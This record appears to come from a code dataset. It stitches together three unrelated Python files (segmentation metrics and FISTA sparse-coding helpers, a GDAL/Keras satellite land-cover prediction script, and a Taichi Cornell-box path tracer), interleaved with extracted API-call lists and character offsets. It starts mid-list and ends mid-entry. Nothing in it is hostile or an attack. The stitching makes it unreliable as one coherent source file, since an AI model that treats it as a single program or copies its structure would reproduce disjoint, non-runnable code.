'(dev_nll)\n', (4622, 4631), True, 'import numpy as np\n')] |
# coding:utf-8
import numpy as np
import torch
import math
import cv2
class IOUMetric(object):
"""
Class to calculate mean-iou using fast_hist method
"""
def __init__(self, num_classes):
self.num_classes = num_classes
self.hist = np.zeros((num_classes, num_classes))
def _fast_hist(self, label_pred, label_true):
mask = (label_true >= 0) & (label_true < self.num_classes)
hist = np.bincount(
self.num_classes * label_true[mask].astype(int) +
label_pred[mask], minlength=self.num_classes ** 2).reshape(self.num_classes, self.num_classes)
return hist
def add_batch(self, predictions, gts):
for lp, lt in zip(predictions, gts):
self.hist += self._fast_hist(lp.flatten(), lt.flatten())
def evaluate(self):
acc = np.diag(self.hist).sum() / self.hist.sum()
acc_cls = np.diag(self.hist) / self.hist.sum(axis=1)
acc_cls = np.nanmean(acc_cls)
iu = np.diag(self.hist) / (self.hist.sum(axis=1) + self.hist.sum(axis=0) - np.diag(self.hist))
mean_iu = np.nanmean(iu)
freq = self.hist.sum(axis=1) / self.hist.sum()
fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()
return acc, acc_cls, iu, mean_iu, fwavacc
def soft_thresholding(x, lm):
ze_ = torch.zeros(size=x.size(), device=x.device)
return torch.sign(x) * torch.maximum(torch.abs(x) - lm, ze_)
@torch.no_grad()
def fast_ista(b, A, lmbda, max_iter):
"""
This is the fast Iterative Shrinkage-Thresholding Algorithm to solve the following objective:
min: {L2_norm(Ax - b) + L1_norm(x)}
:param b: input data with shape: [n_samples, n_features]
:param A: a pre-learned Dictionary, with shape: [n_coeffs, n_features]
:param lmbda: sparsity term to control the importance of the L1 term
:param max_iter:
:return: sparse codes with shape: [n_samples, n_coeffs]
"""
n_coeffs, n_feats = A.size()
n_samples = b.size()[0]
x = torch.zeros(size=(n_samples, n_coeffs), device=b.device)
t = 1.
z = torch.zeros(size=(n_samples, n_coeffs), device=b.device)
L = torch.linalg.norm(A, ord=2) ** 2 # Lipschitz constant, 2-norm (largest sing. value)
for k in range(max_iter):
x_old = x.clone()
z = z + torch.matmul(b - torch.matmul(z, A), A.T) / L
x = soft_thresholding(z, lmbda / L)
t0 = t
t = (1. + math.sqrt(1. + 4. * t ** 2)) / 2.
z = x + ((t0 - 1.) / t) * (x - x_old)
return x
def tensor_to_dtm(masks, mask_size, kernel=5, dist_type=cv2.DIST_L2):
device = masks.device
masks = masks.view(masks.shape[0], mask_size, mask_size).cpu().numpy()
masks = masks.astype(np.uint8)
DTMs = []
for m in masks:
dist_m = cv2.distanceTransform(m, distanceType=dist_type, maskSize=kernel)
dist_m = dist_m / max(np.max(dist_m), 1.) # basic dtms in (0, 1)
dist_map = np.where(dist_m > 0, dist_m, -1).astype(np.float32) # DTM in (-1, 0-1)
DTMs.append(dist_map.reshape((1, -1)))
DTMs = np.concatenate(DTMs, axis=0)
DTMs = torch.from_numpy(DTMs).to(torch.float32).to(device)
return DTMs
def prepare_distance_transform_from_mask_with_weights(masks, mask_size, kernel=3, dist_type=cv2.DIST_L2, fg_weighting=1.0, bg_weighting=0.9, mask_bias=-0.1):
"""
Given a set of masks as torch tensor, convert to numpy array, find distance transform maps from them,
and convert DTMs back to torch tensor, a weight map with 1 - DTM will be returned(emphasizing boundary and thin parts)
:param mask_bias: bias set for the pixels outside the contour
:param fg_weighting: weighting for foreground pixels on the DTMs
:param bg_weighting: weighting for background pixels on the DTMs
:param dist_type: used for distance transform
:param kernel: kernel size for distance transforms
:param masks: input masks for instance segmentation, shape: (N, mask_size, mask_size)
:param mask_size: input mask size
:return: a set of distance transform maps, and a weight map in torch tensor, with the same shape as input masks
"""
assert mask_size * mask_size == masks.shape[1]
device = masks.device
masks = masks.view(masks.shape[0], mask_size, mask_size).cpu().numpy()
masks = masks.astype(np.uint8)
DTMs = []
weight_maps = []
HD_maps = []
for m in masks:
dist_m = cv2.distanceTransform(m, distanceType=dist_type, maskSize=kernel)
dist_peak = np.max(dist_m)
dist_m = dist_m / (dist_peak + 1e-6) # basic dtms in (0, 1)
weight_map = np.where(dist_m > 0, fg_weighting + bg_weighting - dist_m, bg_weighting).astype(np.float32)
dist_map = np.where(dist_m > 0, dist_m, -1).astype(np.float32) # DTM in (-1, 0-1)
hd_map = np.where(dist_m > 0, dist_m ** 2., mask_bias).astype(np.float32) # not sure why the best
weight_maps.append(weight_map.reshape((1, -1)))
DTMs.append(dist_map.reshape((1, -1)))
HD_maps.append(hd_map.reshape((1, -1)))
DTMs = np.concatenate(DTMs, axis=0)
weight_maps = np.concatenate(weight_maps, axis=0)
HD_maps = np.concatenate(HD_maps, axis=0)
DTMs = torch.from_numpy(DTMs).to(torch.float32).to(device)
weight_maps = torch.from_numpy(weight_maps).to(torch.float32).to(device)
HD_maps = torch.from_numpy(HD_maps).to(torch.float32).to(device)
return DTMs, weight_maps, HD_maps
| [
"torch.from_numpy",
"math.sqrt",
"torch.matmul",
"numpy.zeros",
"torch.sign",
"numpy.max",
"numpy.where",
"torch.linalg.norm",
"torch.zeros",
"numpy.diag",
"torch.no_grad",
"torch.abs",
"cv2.distanceTransform",
"numpy.concatenate",
"numpy.nanmean"
] | [((1428, 1443), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1441, 1443), False, 'import torch\n'), ((1995, 2051), 'torch.zeros', 'torch.zeros', ([], {'size': '(n_samples, n_coeffs)', 'device': 'b.device'}), '(size=(n_samples, n_coeffs), device=b.device)\n', (2006, 2051), False, 'import torch\n'), ((2071, 2127), 'torch.zeros', 'torch.zeros', ([], {'size': '(n_samples, n_coeffs)', 'device': 'b.device'}), '(size=(n_samples, n_coeffs), device=b.device)\n', (2082, 2127), False, 'import torch\n'), ((3061, 3089), 'numpy.concatenate', 'np.concatenate', (['DTMs'], {'axis': '(0)'}), '(DTMs, axis=0)\n', (3075, 3089), True, 'import numpy as np\n'), ((5050, 5078), 'numpy.concatenate', 'np.concatenate', (['DTMs'], {'axis': '(0)'}), '(DTMs, axis=0)\n', (5064, 5078), True, 'import numpy as np\n'), ((5097, 5132), 'numpy.concatenate', 'np.concatenate', (['weight_maps'], {'axis': '(0)'}), '(weight_maps, axis=0)\n', (5111, 5132), True, 'import numpy as np\n'), ((5147, 5178), 'numpy.concatenate', 'np.concatenate', (['HD_maps'], {'axis': '(0)'}), '(HD_maps, axis=0)\n', (5161, 5178), True, 'import numpy as np\n'), ((266, 302), 'numpy.zeros', 'np.zeros', (['(num_classes, num_classes)'], {}), '((num_classes, num_classes))\n', (274, 302), True, 'import numpy as np\n'), ((957, 976), 'numpy.nanmean', 'np.nanmean', (['acc_cls'], {}), '(acc_cls)\n', (967, 976), True, 'import numpy as np\n'), ((1098, 1112), 'numpy.nanmean', 'np.nanmean', (['iu'], {}), '(iu)\n', (1108, 1112), True, 'import numpy as np\n'), ((1371, 1384), 'torch.sign', 'torch.sign', (['x'], {}), '(x)\n', (1381, 1384), False, 'import torch\n'), ((2136, 2163), 'torch.linalg.norm', 'torch.linalg.norm', (['A'], {'ord': '(2)'}), '(A, ord=2)\n', (2153, 2163), False, 'import torch\n'), ((2771, 2836), 'cv2.distanceTransform', 'cv2.distanceTransform', (['m'], {'distanceType': 'dist_type', 'maskSize': 'kernel'}), '(m, distanceType=dist_type, maskSize=kernel)\n', (2792, 2836), False, 'import cv2\n'), ((4404, 4469), 
'cv2.distanceTransform', 'cv2.distanceTransform', (['m'], {'distanceType': 'dist_type', 'maskSize': 'kernel'}), '(m, distanceType=dist_type, maskSize=kernel)\n', (4425, 4469), False, 'import cv2\n'), ((4490, 4504), 'numpy.max', 'np.max', (['dist_m'], {}), '(dist_m)\n', (4496, 4504), True, 'import numpy as np\n'), ((896, 914), 'numpy.diag', 'np.diag', (['self.hist'], {}), '(self.hist)\n', (903, 914), True, 'import numpy as np\n'), ((990, 1008), 'numpy.diag', 'np.diag', (['self.hist'], {}), '(self.hist)\n', (997, 1008), True, 'import numpy as np\n'), ((1060, 1078), 'numpy.diag', 'np.diag', (['self.hist'], {}), '(self.hist)\n', (1067, 1078), True, 'import numpy as np\n'), ((1401, 1413), 'torch.abs', 'torch.abs', (['x'], {}), '(x)\n', (1410, 1413), False, 'import torch\n'), ((2417, 2446), 'math.sqrt', 'math.sqrt', (['(1.0 + 4.0 * t ** 2)'], {}), '(1.0 + 4.0 * t ** 2)\n', (2426, 2446), False, 'import math\n'), ((2867, 2881), 'numpy.max', 'np.max', (['dist_m'], {}), '(dist_m)\n', (2873, 2881), True, 'import numpy as np\n'), ((2930, 2962), 'numpy.where', 'np.where', (['(dist_m > 0)', 'dist_m', '(-1)'], {}), '(dist_m > 0, dist_m, -1)\n', (2938, 2962), True, 'import numpy as np\n'), ((4596, 4668), 'numpy.where', 'np.where', (['(dist_m > 0)', '(fg_weighting + bg_weighting - dist_m)', 'bg_weighting'], {}), '(dist_m > 0, fg_weighting + bg_weighting - dist_m, bg_weighting)\n', (4604, 4668), True, 'import numpy as np\n'), ((4707, 4739), 'numpy.where', 'np.where', (['(dist_m > 0)', 'dist_m', '(-1)'], {}), '(dist_m > 0, dist_m, -1)\n', (4715, 4739), True, 'import numpy as np\n'), ((4796, 4842), 'numpy.where', 'np.where', (['(dist_m > 0)', '(dist_m ** 2.0)', 'mask_bias'], {}), '(dist_m > 0, dist_m ** 2.0, mask_bias)\n', (4804, 4842), True, 'import numpy as np\n'), ((835, 853), 'numpy.diag', 'np.diag', (['self.hist'], {}), '(self.hist)\n', (842, 853), True, 'import numpy as np\n'), ((3101, 3123), 'torch.from_numpy', 'torch.from_numpy', (['DTMs'], {}), '(DTMs)\n', (3117, 3123), 
False, 'import torch\n'), ((5190, 5212), 'torch.from_numpy', 'torch.from_numpy', (['DTMs'], {}), '(DTMs)\n', (5206, 5212), False, 'import torch\n'), ((5260, 5289), 'torch.from_numpy', 'torch.from_numpy', (['weight_maps'], {}), '(weight_maps)\n', (5276, 5289), False, 'import torch\n'), ((5333, 5358), 'torch.from_numpy', 'torch.from_numpy', (['HD_maps'], {}), '(HD_maps)\n', (5349, 5358), False, 'import torch\n'), ((2311, 2329), 'torch.matmul', 'torch.matmul', (['z', 'A'], {}), '(z, A)\n', (2323, 2329), False, 'import torch\n')] |
# -*- coding: utf-8 -*-
"""
@author: <NAME>, Dept. of Land Surveying and Geo-Informatics, The Hong Kong Polytechnic Univ.
Email: <EMAIL>
"""
import gdal
import numpy as np
import keras
import rscls
import glob
data = 'all'
pfile = 'model/p48all_1602772409.6505635.h5'
size = 48
#%%
im1_file = r'images/Guangzhou.tif'
#ims = glob.glob(r'D:\DL_prd_lcz\data\predicted\*.tif')
#for im1_file in ims:
if True:
print(im1_file)
#%%
bgx,bgy,imx,imy = 0,0,10980,10980
def setGeo2(geotransform,bgx,bgy,scale):
reset0 = geotransform[0]
reset1 = geotransform[1] * scale
reset3 = geotransform[3]
reset5 = geotransform[5] * scale
reset = (reset0,reset1,geotransform[2],
reset3,geotransform[4],reset5)
return reset
#%%
if True:
if True:
p = keras.models.load_model(pfile)
# load
im = gdal.Open(im1_file,gdal.GA_ReadOnly)
gt = np.uint8(np.zeros([imx,imy]))
prj = im.GetProjection()
geo = im.GetGeoTransform()
newgeo = setGeo2(geo,bgx,bgy,10)
im = im.ReadAsArray(bgx,bgy,imx,imy)
im = im.transpose(1,2,0)
im1x,im1y,im1z = im.shape
im = np.float32(im)
im = im/5000.0
c1 = rscls.rscls(im,gt,cls=17)
c1.padding(size)
im = c1.im
im2x,im2y,im2z = im.shape
# predict part
pre_all_1 = []
ensemble = 1
for i in range(ensemble):
pre_rows_1 = []
# uncomment below if snapshot ensemble activated
# model1.fit(x1_train,y1_train,batch_size=bsz1,epochs=2,verbose=vbs,shuffle=True)
for j in range(im1x//10):
if j%10==0:
print(j)
#print(j) uncomment to monitor predicing stages
sam_row = c1.all_sample_row_multi(j*10,10)
pre_row1 = np.argmax(p.predict(sam_row),axis=1)
pre_row1 = pre_row1.reshape(1,im1y//10)
pre_rows_1.append(pre_row1)
pre_all_1.append(np.array(pre_rows_1))
# nipy_spectral, jet
a = np.array(pre_all_1).reshape(im1x//10,im1y//10)
rscls.save_cmap(a, 'nipy_spectral', im1_file[:-4]+'_pre.png')
# save as geocode-tif
name = im1_file[:-4]+'_pre'
outdata = gdal.GetDriverByName('GTiff').Create(name+'.tif', im1y//10, im1x//10, 1, gdal.GDT_UInt16)
outdata.SetGeoTransform(newgeo)
outdata.SetProjection(prj)
outdata.GetRasterBand(1).WriteArray(a+1)
outdata.FlushCache() ##saves to disk!!
outdata = None | [
"keras.models.load_model",
"gdal.GetDriverByName",
"numpy.float32",
"numpy.zeros",
"gdal.Open",
"rscls.save_cmap",
"numpy.array",
"rscls.rscls"
] | [((2380, 2443), 'rscls.save_cmap', 'rscls.save_cmap', (['a', '"""nipy_spectral"""', "(im1_file[:-4] + '_pre.png')"], {}), "(a, 'nipy_spectral', im1_file[:-4] + '_pre.png')\n", (2395, 2443), False, 'import rscls\n'), ((851, 881), 'keras.models.load_model', 'keras.models.load_model', (['pfile'], {}), '(pfile)\n', (874, 881), False, 'import keras\n'), ((931, 968), 'gdal.Open', 'gdal.Open', (['im1_file', 'gdal.GA_ReadOnly'], {}), '(im1_file, gdal.GA_ReadOnly)\n', (940, 968), False, 'import gdal\n'), ((1282, 1296), 'numpy.float32', 'np.float32', (['im'], {}), '(im)\n', (1292, 1296), True, 'import numpy as np\n'), ((1354, 1381), 'rscls.rscls', 'rscls.rscls', (['im', 'gt'], {'cls': '(17)'}), '(im, gt, cls=17)\n', (1365, 1381), False, 'import rscls\n'), ((2329, 2348), 'numpy.array', 'np.array', (['pre_all_1'], {}), '(pre_all_1)\n', (2337, 2348), True, 'import numpy as np\n'), ((2519, 2548), 'gdal.GetDriverByName', 'gdal.GetDriverByName', (['"""GTiff"""'], {}), "('GTiff')\n", (2539, 2548), False, 'import gdal\n'), ((994, 1014), 'numpy.zeros', 'np.zeros', (['[imx, imy]'], {}), '([imx, imy])\n', (1002, 1014), True, 'import numpy as np\n'), ((2257, 2277), 'numpy.array', 'np.array', (['pre_rows_1'], {}), '(pre_rows_1)\n', (2265, 2277), True, 'import numpy as np\n')] |
import taichi as ti
import time
import math
import numpy as np
from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract
ti.init(arch=ti.gpu)  # run on the GPU backend when one is available

# Output resolution and the radiance accumulation buffer (one RGB sum per pixel).
res = (800, 800)
color_buffer = ti.Vector(3, dt=ti.f32, shape=res)

# Path-tracer parameters.
max_ray_depth = 10
eps = 1e-4   # small offset used to avoid self-intersection artifacts
inf = 1e10   # sentinel distance meaning "no hit"
fov = 1.0
camera_pos = ti.Vector([0.0, 0.6, 2.0])

# Axis-aligned rectangular area light on the ceiling (min/max corners).
# NOTE(review): "lihgt" is a typo for "light"; renaming would also require
# updating intersect_light(), so the name is left as-is here.
lihgt_min_pos = ti.Vector([-0.2, 1.99, 0.3])
light_max_pos = ti.Vector([0.2, 1.99, 0.4])
light_color = ti.Vector([0.9, 0.85, 0.7])

# Material ids used by out_dir() / next_hit().
mat_lambertian = 0
mat_metal = 1
mat_glass = 2
refr_idx = 2.4  # diamond!

# right near sphere
sp1_center = ti.Vector([0.35, 0.22, 1.14])
sp1_radius = 0.21
# left far sphere
sp2_center = ti.Vector([-0.28, 0.6, 0.6])
sp2_radius = 0.42
@ti.func
def intersect_light(pos, d):
    # Ray vs. the ceiling light's axis-aligned box. Returns the hit distance
    # along d, or `inf` when the ray misses the box or the box is behind the
    # ray origin (tmin < 0).
    intersect, tmin, _ = ray_aabb_intersection(lihgt_min_pos, light_max_pos,
                                              pos, d)
    if tmin < 0 or intersect == 0:
        tmin = inf
    return tmin
@ti.func
def schlick(cos, eta):
    # Schlick's approximation of the Fresnel reflectance for a surface with
    # relative refractive index `eta`, given the cosine of the incident angle.
    base = (1.0 - eta) / (1.0 + eta)
    base = base * base
    return base + (1.0 - base) * ((1.0 - cos)**5)
@ti.func
def out_dir(indir, n, mat):
    # Scatter direction for incoming ray `indir` hitting a surface with unit
    # normal `n` and material id `mat`. Returns a unit vector.
    u = ti.Vector([1.0, 0.0, 0.0])
    if mat == mat_lambertian:
        # Cosine-weighted hemisphere sample: build a tangent frame (u, v, n),
        # then ay = cos(theta) = sqrt(U) gives the cosine weighting.
        if abs(n[1]) < 1 - eps:
            # Pick a tangent via cross with world-up; guarded so n is not
            # (numerically) parallel to +Y.
            u = ti.normalized(ti.cross(n, ti.Vector([0.0, 1.0, 0.0])))
        v = ti.cross(n, u)
        phi = 2 * math.pi * ti.random()
        ay = ti.sqrt(ti.random())
        ax = ti.sqrt(1 - ay**2)
        u = ax * (ti.cos(phi) * u + ti.sin(phi) * v) + ay * n
    elif mat == mat_metal:
        u = reflect(indir, n)
    else:
        # glass
        cos = ti.dot(indir, n)
        ni_over_nt = refr_idx
        outn = n
        if cos > 0.0:
            # Ray is leaving the medium: flip the normal and scale the
            # cosine by the refractive index for Schlick's formula.
            outn = -n
            cos = refr_idx * cos
        else:
            ni_over_nt = 1.0 / refr_idx
            cos = -cos
        has_refr, refr_dir = refract(indir, outn, ni_over_nt)
        # No refracted ray means total internal reflection (probability 1).
        refl_prob = 1.0
        if has_refr:
            refl_prob = schlick(cos, refr_idx)
        # Stochastic choice between reflection and refraction.
        if ti.random() < refl_prob:
            u = reflect(indir, n)
        else:
            u = refr_dir
    return ti.normalized(u)
@ti.func
def next_hit(pos, d):
    # Closest intersection of ray (pos, d) against the whole scene: the two
    # spheres plus the five Cornell-box planes. Returns
    # (distance, normal, albedo, material id); distance stays `inf` and the
    # normal stays the zero vector when nothing is hit.
    closest, normal = inf, ti.Vector.zero(ti.f32, 3)
    c, mat = ti.Vector.zero(ti.f32, 3), mat_lambertian
    # right near sphere
    cur_dist, hit_pos = intersect_sphere(pos, d, sp1_center, sp1_radius)
    if 0 < cur_dist < closest:
        closest = cur_dist
        normal = ti.normalized(hit_pos - sp1_center)
        c, mat = ti.Vector([1.0, 1.0, 1.0]), mat_glass
    # left far sphere
    cur_dist, hit_pos = intersect_sphere(pos, d, sp2_center, sp2_radius)
    if 0 < cur_dist < closest:
        closest = cur_dist
        normal = ti.normalized(hit_pos - sp2_center)
        c, mat = ti.Vector([0.8, 0.5, 0.4]), mat_metal
    # left wall (red albedo)
    pnorm = ti.Vector([1.0, 0.0, 0.0])
    cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([-1.0, 0.0, 0.0]),
                                      pnorm)
    if 0 < cur_dist < closest:
        closest = cur_dist
        normal = pnorm
        c, mat = ti.Vector([1.0, 0.0, 0.0]), mat_lambertian
    # right wall (green albedo)
    pnorm = ti.Vector([-1.0, 0.0, 0.0])
    cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([1.0, 0.0, 0.0]),
                                      pnorm)
    if 0 < cur_dist < closest:
        closest = cur_dist
        normal = pnorm
        c, mat = ti.Vector([0.0, 1.0, 0.0]), mat_lambertian
    # bottom (floor, white)
    pnorm = ti.Vector([0.0, 1.0, 0.0])
    cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([0.0, 0.0, 0.0]),
                                      pnorm)
    if 0 < cur_dist < closest:
        closest = cur_dist
        normal = pnorm
        c, mat = ti.Vector([1.0, 1.0, 1.0]), mat_lambertian
    # top (ceiling, white)
    pnorm = ti.Vector([0.0, -1.0, 0.0])
    cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([0.0, 2.0, 0.0]),
                                      pnorm)
    if 0 < cur_dist < closest:
        closest = cur_dist
        normal = pnorm
        c, mat = ti.Vector([1.0, 1.0, 1.0]), mat_lambertian
    # far (back wall, white)
    pnorm = ti.Vector([0.0, 0.0, 1.0])
    cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([0.0, 0.0, 0.0]),
                                      pnorm)
    if 0 < cur_dist < closest:
        closest = cur_dist
        normal = pnorm
        c, mat = ti.Vector([1.0, 1.0, 1.0]), mat_lambertian
    return closest, normal, c, mat
@ti.kernel
def render():
    # Trace one path per pixel and accumulate its radiance contribution into
    # color_buffer (the host loop divides by the sample count when displaying).
    for u, v in color_buffer:
        aspect_ratio = res[0] / res[1]
        pos = camera_pos
        # Primary ray through pixel (u, v); ti.random() jitters the sample
        # position inside the pixel for anti-aliasing.
        d = ti.Vector([
            (2 * fov * (u + ti.random()) / res[1] - fov * aspect_ratio - 1e-5),
            (2 * fov * (v + ti.random()) / res[1] - fov - 1e-5),
            -1.0,
        ])
        d = ti.normalized(d)
        throughput = ti.Vector([1.0, 1.0, 1.0])
        depth = 0
        hit_light = 0.0
        while depth < max_ray_depth:
            closest, normal, c, mat = next_hit(pos, d)
            depth += 1
            dist_to_light = intersect_light(pos, d)
            if dist_to_light < closest:
                # The area light is the nearest thing along the ray:
                # terminate the path and keep its accumulated throughput.
                hit_light = 1.0
                depth = max_ray_depth
                throughput *= light_color
            else:
                if normal.norm_sqr() != 0:
                    hit_pos = pos + closest * d
                    d = out_dir(d, normal, mat)
                    pos = hit_pos + 1e-4 * d  # nudge off the surface to avoid self-hit
                    throughput *= c
                else:
                    # Zero normal from next_hit() means the ray escaped the scene.
                    depth = max_ray_depth
        color_buffer[u, v] += throughput * hit_light
# Progressive display: keep adding one sample per pixel per frame and show the
# running average every `interval` iterations.
gui = ti.GUI('Cornell Box', res)
last_t = 0
for i in range(50000):
    render()
    interval = 10
    if i % interval == 0 and i > 0:
        print("{:.2f} samples/s".format(interval / (time.time() - last_t)))
        last_t = time.time()
        # Average the accumulated radiance over i+1 samples, then normalize
        # brightness and apply a sqrt (approximate gamma) for display.
        img = color_buffer.to_numpy(as_vector=True) * (1 / (i + 1))
        img = img / img.mean() * 0.24
        gui.set_image(np.sqrt(img))
        gui.show()
| [
"taichi.Vector.zero",
"taichi.GUI",
"taichi.sin",
"taichi.cross",
"taichi.random",
"renderer_utils.reflect",
"time.time",
"taichi.dot",
"renderer_utils.refract",
"renderer_utils.ray_aabb_intersection",
"taichi.init",
"taichi.sqrt",
"taichi.cos",
"taichi.Vector",
"taichi.normalized",
"r... | [((170, 190), 'taichi.init', 'ti.init', ([], {'arch': 'ti.gpu'}), '(arch=ti.gpu)\n', (177, 190), True, 'import taichi as ti\n'), ((223, 257), 'taichi.Vector', 'ti.Vector', (['(3)'], {'dt': 'ti.f32', 'shape': 'res'}), '(3, dt=ti.f32, shape=res)\n', (232, 257), True, 'import taichi as ti\n'), ((323, 349), 'taichi.Vector', 'ti.Vector', (['[0.0, 0.6, 2.0]'], {}), '([0.0, 0.6, 2.0])\n', (332, 349), True, 'import taichi as ti\n'), ((366, 394), 'taichi.Vector', 'ti.Vector', (['[-0.2, 1.99, 0.3]'], {}), '([-0.2, 1.99, 0.3])\n', (375, 394), True, 'import taichi as ti\n'), ((411, 438), 'taichi.Vector', 'ti.Vector', (['[0.2, 1.99, 0.4]'], {}), '([0.2, 1.99, 0.4])\n', (420, 438), True, 'import taichi as ti\n'), ((453, 480), 'taichi.Vector', 'ti.Vector', (['[0.9, 0.85, 0.7]'], {}), '([0.9, 0.85, 0.7])\n', (462, 480), True, 'import taichi as ti\n'), ((589, 618), 'taichi.Vector', 'ti.Vector', (['[0.35, 0.22, 1.14]'], {}), '([0.35, 0.22, 1.14])\n', (598, 618), True, 'import taichi as ti\n'), ((668, 696), 'taichi.Vector', 'ti.Vector', (['[-0.28, 0.6, 0.6]'], {}), '([-0.28, 0.6, 0.6])\n', (677, 696), True, 'import taichi as ti\n'), ((5474, 5500), 'taichi.GUI', 'ti.GUI', (['"""Cornell Box"""', 'res'], {}), "('Cornell Box', res)\n", (5480, 5500), True, 'import taichi as ti\n'), ((780, 839), 'renderer_utils.ray_aabb_intersection', 'ray_aabb_intersection', (['lihgt_min_pos', 'light_max_pos', 'pos', 'd'], {}), '(lihgt_min_pos, light_max_pos, pos, d)\n', (801, 839), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((1134, 1160), 'taichi.Vector', 'ti.Vector', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (1143, 1160), True, 'import taichi as ti\n'), ((2078, 2094), 'taichi.normalized', 'ti.normalized', (['u'], {}), '(u)\n', (2091, 2094), True, 'import taichi as ti\n'), ((2285, 2333), 'renderer_utils.intersect_sphere', 'intersect_sphere', (['pos', 'd', 'sp1_center', 'sp1_radius'], {}), '(pos, d, sp1_center, 
sp1_radius)\n', (2301, 2333), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((2546, 2594), 'renderer_utils.intersect_sphere', 'intersect_sphere', (['pos', 'd', 'sp2_center', 'sp2_radius'], {}), '(pos, d, sp2_center, sp2_radius)\n', (2562, 2594), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((2784, 2810), 'taichi.Vector', 'ti.Vector', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (2793, 2810), True, 'import taichi as ti\n'), ((3096, 3123), 'taichi.Vector', 'ti.Vector', (['[-1.0, 0.0, 0.0]'], {}), '([-1.0, 0.0, 0.0])\n', (3105, 3123), True, 'import taichi as ti\n'), ((3409, 3435), 'taichi.Vector', 'ti.Vector', (['[0.0, 1.0, 0.0]'], {}), '([0.0, 1.0, 0.0])\n', (3418, 3435), True, 'import taichi as ti\n'), ((3718, 3745), 'taichi.Vector', 'ti.Vector', (['[0.0, -1.0, 0.0]'], {}), '([0.0, -1.0, 0.0])\n', (3727, 3745), True, 'import taichi as ti\n'), ((4028, 4054), 'taichi.Vector', 'ti.Vector', (['[0.0, 0.0, 1.0]'], {}), '([0.0, 0.0, 1.0])\n', (4037, 4054), True, 'import taichi as ti\n'), ((1306, 1320), 'taichi.cross', 'ti.cross', (['n', 'u'], {}), '(n, u)\n', (1314, 1320), True, 'import taichi as ti\n'), ((1408, 1428), 'taichi.sqrt', 'ti.sqrt', (['(1 - ay ** 2)'], {}), '(1 - ay ** 2)\n', (1415, 1428), True, 'import taichi as ti\n'), ((2155, 2180), 'taichi.Vector.zero', 'ti.Vector.zero', (['ti.f32', '(3)'], {}), '(ti.f32, 3)\n', (2169, 2180), True, 'import taichi as ti\n'), ((2194, 2219), 'taichi.Vector.zero', 'ti.Vector.zero', (['ti.f32', '(3)'], {}), '(ti.f32, 3)\n', (2208, 2219), True, 'import taichi as ti\n'), ((2409, 2444), 'taichi.normalized', 'ti.normalized', (['(hit_pos - sp1_center)'], {}), '(hit_pos - sp1_center)\n', (2422, 2444), True, 'import taichi as ti\n'), ((2670, 2705), 'taichi.normalized', 'ti.normalized', (['(hit_pos - sp2_center)'], {}), '(hit_pos - sp2_center)\n', (2683, 2705), True, 'import taichi as 
ti\n'), ((2857, 2884), 'taichi.Vector', 'ti.Vector', (['[-1.0, 0.0, 0.0]'], {}), '([-1.0, 0.0, 0.0])\n', (2866, 2884), True, 'import taichi as ti\n'), ((3170, 3196), 'taichi.Vector', 'ti.Vector', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (3179, 3196), True, 'import taichi as ti\n'), ((3482, 3508), 'taichi.Vector', 'ti.Vector', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (3491, 3508), True, 'import taichi as ti\n'), ((3792, 3818), 'taichi.Vector', 'ti.Vector', (['[0.0, 2.0, 0.0]'], {}), '([0.0, 2.0, 0.0])\n', (3801, 3818), True, 'import taichi as ti\n'), ((4101, 4127), 'taichi.Vector', 'ti.Vector', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (4110, 4127), True, 'import taichi as ti\n'), ((4682, 4698), 'taichi.normalized', 'ti.normalized', (['d'], {}), '(d)\n', (4695, 4698), True, 'import taichi as ti\n'), ((4721, 4747), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (4730, 4747), True, 'import taichi as ti\n'), ((5695, 5706), 'time.time', 'time.time', ([], {}), '()\n', (5704, 5706), False, 'import time\n'), ((1349, 1360), 'taichi.random', 'ti.random', ([], {}), '()\n', (1358, 1360), True, 'import taichi as ti\n'), ((1382, 1393), 'taichi.random', 'ti.random', ([], {}), '()\n', (1391, 1393), True, 'import taichi as ti\n'), ((1528, 1545), 'renderer_utils.reflect', 'reflect', (['indir', 'n'], {}), '(indir, n)\n', (1535, 1545), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((1586, 1602), 'taichi.dot', 'ti.dot', (['indir', 'n'], {}), '(indir, n)\n', (1592, 1602), True, 'import taichi as ti\n'), ((1833, 1865), 'renderer_utils.refract', 'refract', (['indir', 'outn', 'ni_over_nt'], {}), '(indir, outn, ni_over_nt)\n', (1840, 1865), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((2462, 2488), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (2471, 
